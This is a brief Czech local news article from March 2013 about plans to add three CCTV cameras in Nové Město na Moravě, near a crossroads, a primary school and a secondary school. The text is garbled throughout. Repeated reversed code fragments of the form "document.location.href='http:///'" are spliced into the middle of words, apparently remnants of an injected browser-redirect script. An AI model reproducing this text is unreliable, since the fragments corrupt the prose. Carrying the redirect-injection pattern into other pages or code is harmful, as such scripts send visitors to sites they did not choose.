Nové Město na Moravě, nove mesto na morave, aktuality, kamery
Rainbow page separator

Ve Městě by mohly přibýt další tři kamery

Neděle, 10. března 2013

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Rozšířit městský kamerový systém by se v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce mohlo podařit v Novém Městě na Moravě, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prostřednictvím krajského dotačního titulu Prevence kriminality. Pokud se povede získat potřebné finance, přibudou v Novém Městě ke stávajícím šestnácti další tři záznamové kamery. První z nich by měla být instalována v Tyršově ulici, aby „hlídala“ pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor od křižovatky ulic Tyršova a Monseova ve směru ke kulturnímu domu.

Druhá kamera na přístavbě základní školy v Tyršově ulici by moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torovala pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor před školou a tělocvičnou.

Umístění třetí kamery je plánováno v lokalitě Bělisko, kde by zařízení mělo sledovat zónu před střední školou a křižovatku ulic Malá a Lesní.